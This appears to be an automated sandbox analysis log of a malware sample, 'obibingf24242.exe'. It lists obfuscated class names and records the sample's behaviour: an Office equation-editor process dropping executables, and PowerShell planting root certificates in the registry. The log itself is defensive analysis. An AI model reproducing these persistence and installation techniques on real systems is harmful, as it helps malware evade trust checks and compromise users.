Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, BXplLTWfheod5WBiyg.cs High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, Nffji0ITJKe56hgjhg.cs High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.cs High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, YqOlYl2eFwtfPkt21E.cs High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, MhaIhDzaPUNsFfpULt.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, RqmCPZsVMMv5nbrMN6.cs High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, iNFWmT65K4oBOHdv97.cs High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, mdHoHt9MfgQhGOrMY7.cs High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, PonY1JM82D8ygbKCcG.cs High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, OOJ1Sjc3ammghXBN9E.cs High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, LDBvEBvJJ3O33kFquaV.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, ySkLlbvukfHRnCTtESI.cs High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, aIGDt4fqLpMXZpZXEp.cs High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, vVt6wEQ8mT4XM4diZg.cs High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, amwXR0CPXsVauy8NYU.cs High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, oU7Yibkb84IpiWUtkd.cs High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, BXplLTWfheod5WBiyg.cs High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, Nffji0ITJKe56hgjhg.cs High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\obibingf24242.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
